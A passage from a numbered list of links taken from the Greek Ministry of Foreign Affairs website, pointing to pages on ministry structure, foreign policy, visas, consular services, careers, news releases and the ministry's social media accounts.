  3310.   19. http://www.mfa.gr/to-ypourgeio/domi/ydas.html
  3311.   20. http://www.mfa.gr/diplomatiko-kai-istoriko-arheio/
  3312.   21. http://www.mfa.gr/to-ypourgeio/domi/kas.html
  3313.   22. http://www.mfa.gr/to-ypourgeio/domi/grafeio-proothisis-ellinikon-ypopsifiotiton-se-diethneis-kai-yperethnikous-organismous.html
  3314.   23. http://www.mfa.gr/epopteuomenoi-organismoi/
  3315.   24. http://www.mfa.gr/to-ypourgeio/istoria/oi-egkatastaseis-tou-ypourgeiou-exoterikon.html
  3316.   25. http://www.mfa.gr/to-ypourgeio/diethneis-symvaseis/
  3317.   26. http://www.mfa.gr/organismos-ypex/
  3318.   27. http://www.mfa.gr/exoteriki-politiki/
  3319.   28. http://www.mfa.gr/dimereis-sheseis-tis-ellados.html
  3320.   29. http://www.mfa.gr/eidika-themata-exoterikis-politikis/
  3321.   30. http://www.mfa.gr/zitimata-ellinotourkikon-sheseon/
  3322.   31. http://www.mfa.gr/kypriako/
  3323.   32. http://www.mfa.gr/to-zitima-tou-onomatos-tis-pgdm/
  3324.   33. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/
  3325.   34. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/dytika-valkania.html
  3326.   35. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesogeios.html
  3327.   36. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesi-anatoli.html
  3328.   37. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/eyxeinos-pontos.html
  3329.   38. http://www.mfa.gr/exoteriki-politiki/i-ellada-stin-ee/
  3330.   39. http://www.mfa.gr/exoteriki-politiki/i-ellada-stous-diethneis-organismous/
  3331.   40. http://www.mfa.gr/exoteriki-politiki/pagkosmia-zitimata/
  3332.   41. http://www.mfa.gr/vouli-kai-exoteriki-politiki/
  3333.   42. http://www.mfa.gr/omilies/
  3334.   43. http://www.mfa.gr/koinovouleutikos-eleghos/
  3335.   44. http://www.mfa.gr/exoteriki-politiki/ethniko-symvoulio-exoterikis-politikis/
  3336.   45. http://www.mfa.gr/epikairotita/
  3337.   46. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/
  3338.   47. http://www.mfa.gr/epikairotita/proto-thema/
  3339.   48. http://www.mfa.gr/epikairotita/enimerosi-syntakton/
  3340.   49. http://www.mfa.gr/epikairotita/diloseis-omilies/
  3341.   50. http://www.mfa.gr/polymesa/
  3342.   51. http://www.mfa.gr/polymesa/video/video-ypex.html
  3343.   52. http://www.mfa.gr/polymesa/photographies/
  3344.   53. http://www.mfa.gr/polymesa/ihitika/
  3345.   54. http://www.mfa.gr/arheio-epikairotitas.html
  3346.   55. http://www.mfa.gr/ypiresies/
  3347.   56. http://www.mfa.gr/ypiresies-gia-ton-politi/
  3348.   57. http://www.mfa.gr/kep-politon-kai-apodimon-ellinon.html
  3349.   58. http://www.mfa.gr/ypiresies-gia-ton-politi/metafrastiki-ypiresia/i-metaphrastiki-ypiresia.html
  3350.   59. http://www.mfa.gr/ypiresies-gia-ton-politi/dioikitikes-ypotheseis/
  3351.   60. http://www.mfa.gr/ypiresies-gia-ton-politi/dikastikes-ypotheseis/
  3352.   61. http://www.mfa.gr/ypiresies-gia-ton-politi/naytiliakes-ypotheseis/
  3353.   62. http://www.mfa.gr/proxeniki-syndromi.html
  3354.   63. http://www.mfa.gr/theoriseis-eisodou-visas/
  3355.   64. http://www.mfa.gr/theoriseis-eisodou-visas/eidi-theoriseon/ethnikes-theoriseis.html
  3356.   65. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-schengen/
  3357.   66. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-allodapous-pou-taxidevoun-stin-ellada/
  3358.   67. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-ellines-pou-taxidevoun-sto-exoteriko/
  3359.   68. http://www.mfa.gr/ypiresies-gia-epiheiriseis/
  3360.   69. http://www.mfa.gr/ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
  3361.   70. http://www.mfa.gr/ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
  3362.   71. http://www.mfa.gr/eykairies-stadiodromias/
  3363.   72. http://www.mfa.gr/dinatotites-epaggelmatikis-stadiodromias-sto-ypex/
  3364.   73. http://www.mfa.gr/eykairies-stadiodromias/epaggelmatiki-stadiodromia-se-diethneis-organismous/
  3365.   74. http://www.mfa.gr/prokirixeis-theseon-dep/
  3366.   75. http://www.mfa.gr/ethelontismos.html
  3367.   76. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
  3368.   77. http://www.mfa.gr/katalogos.html
  3369.   78. http://www.mfa.gr/appendix/dimereis-sheseis-tis-ellados/alpha.html
  3370.   79. http://www.mfa.gr/xenes-arhes-stin-ellada.html
  3371.   80. http://www.mfa.gr/#fragment-1
  3372.   81. http://www.mfa.gr/#fragment-2
  3373.   82. http://www.mfa.gr/#fragment-3
  3374.   83. http://www.mfa.gr/#fragment-4
  3375.   84. http://www.mfa.gr/epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-presbeis-arabikon-khoron-2.html
  3376.   85. http://www.youtube.com/watch?v=Fml5906BXkc
  3377.   86. http://www.mfa.gr/epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upeks-mexikou-pe-candellano-meta-te-sunantese-tous.html
  3378.   87. http://www.youtube.com/watch?v=u8886i9_u70
  3379.   88. http://www.mfa.gr/epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upourgou-tourismou-kephalogianne.html
  3380.   89. http://www.youtube.com/watch?v=GftXlAj8WjA&feature=youtu.be
  3381.   90. http://www.mfa.gr/epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-upourgo-europaikon-upotheseon-kai-exoterikou-emporiou-tes-phinlandias-stubb.html
  3382.   91. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/epikoinonia-tou-upeks-abramopoulou-me-to-neo-eidiko-entetalmeno-tes-ee-gia-ta-anthropina-dikaiomata-st-lamprinide.html
  3383.   92. http://www.mfa.gr/epikairotita/diloseis-omilies/apantese-tou-ekprosopou-upeks-se-eroteseis-skhetika-me-anakoinothen-grapheiou-prothupourgou-pgdm.html
  3384.   93. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-serbias.html
  3385.   94. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-israel.html
  3386.   95. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/sunantese-ellena-diapragmateute-gia-to-thema-tes-onomasias-tes-pgdm-presbe-ad-basilake-me-prosopiko-apestalmeno-ggee-nimetz.html
  3387.   96. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/summetokhe-uphupeks-kourkoula-se-sumboulia-exoterikon-upotheseon-kai-genikon-upotheseon-2.html
  3388.   97. http://www.mfa.gr/eykairies-stadiodromias/
  3389.   98. http://www.mfa.gr/ypiresies-gia-ton-politi/
  3390.   99. http://www.mfa.gr/ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
  3391.  100. http://www.mfa.gr/theoriseis-eisodou-visas/
  3392.  101. http://www.mfa.gr/stoiheia-epikoinonias.html
  3393.  102. http://www.mfa.gr/proxeniki-syndromi.html
  3394.  103. http://www.mfa.gr/ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
  3395.  104. http://sites.diavgeia.gov.gr/mfa
  3396.  105. http://www.facebook.com/mfa.gr
  3397.  106. http://www.flickr.com/photos/GreeceMFA
  3398.  107. http://twitter.com/greecemfa
  3399.  108. http://www.youtube.com/user/GreeceMFA
  3400.  109. http://www.mfa.gr/rss/rss20.xml
  3401.  110. http://www.mfa.gr/to-ypourgeio/
  3402.  111. http://www.mfa.gr/igesia/
  3403.  112. http://www.mfa.gr/domi.html
  3404.  113. http://www.mfa.gr/epopteuomenoi-organismoi/
  3405.  114. http://www.mfa.gr/to-ypourgeio/istoria/oi-egkatastaseis-tou-ypourgeiou-exoterikon.html
  3406.  115. http://www.mfa.gr/to-ypourgeio/diethneis-symvaseis/
  3407.  116. http://www.mfa.gr/organismos-ypex/
  3408.  117. http://www.mfa.gr/exoteriki-politiki/
  3409.  118. http://www.mfa.gr/dimereis-sheseis-tis-ellados.html
  3410.  119. http://www.mfa.gr/eidika-themata-exoterikis-politikis/
  3411.  120. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/
  3412.  121. http://www.mfa.gr/exoteriki-politiki/i-ellada-stin-ee/
  3413.  122. http://www.mfa.gr/exoteriki-politiki/i-ellada-stous-diethneis-organismous/
  3414.  123. http://www.mfa.gr/exoteriki-politiki/pagkosmia-zitimata/
  3415.  124. http://www.mfa.gr/vouli-kai-exoteriki-politiki/
  3416.  125. http://www.mfa.gr/exoteriki-politiki/ethniko-symvoulio-exoterikis-politikis/
  3417.  126. http://www.mfa.gr/epikairotita/
  3418.  127. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/
  3419.  128. http://www.mfa.gr/epikairotita/proto-thema/
  3420.  129. http://www.mfa.gr/epikairotita/enimerosi-syntakton/
  3421.  130. http://www.mfa.gr/epikairotita/diloseis-omilies/
  3422.  131. http://www.mfa.gr/polymesa/
  3423.  132. http://www.mfa.gr/arheio-epikairotitas.html
  3424.  133. http://www.mfa.gr/ypiresies/
  3425.  134. http://www.mfa.gr/ypiresies-gia-ton-politi/
  3426.  135. http://www.mfa.gr/theoriseis-eisodou-visas/
  3427.  136. http://www.mfa.gr/ypiresies-gia-epiheiriseis/
  3428.  137. http://www.mfa.gr/eykairies-stadiodromias/
  3429.  138. http://www.mfa.gr/ethelontismos.html
  3430.  139. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
  3431.  140. http://www.mfa.gr/katalogos.html
  3432.  141. http://www.mfa.gr/appendix/dimereis-sheseis-tis-ellados/alpha.html
  3433.  142. http://www.mfa.gr/xenes-arhes-stin-ellada.html
  3434.  143. http://www.mfa.gr/
  3435.  144. http://www.mfa.gr/sitemap/
  3436.  145. http://www.mfa.gr/search.html
  3437.  146. http://www.mfa.gr/oroi-hrisis.html
  3438.  147. http://www.mfa.gr/links/diadiktiakoi-topoi-ypex/
  3439.  148. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
  3440.  149. javascript:void(null);
  3441.  150. http://www.elxis.org/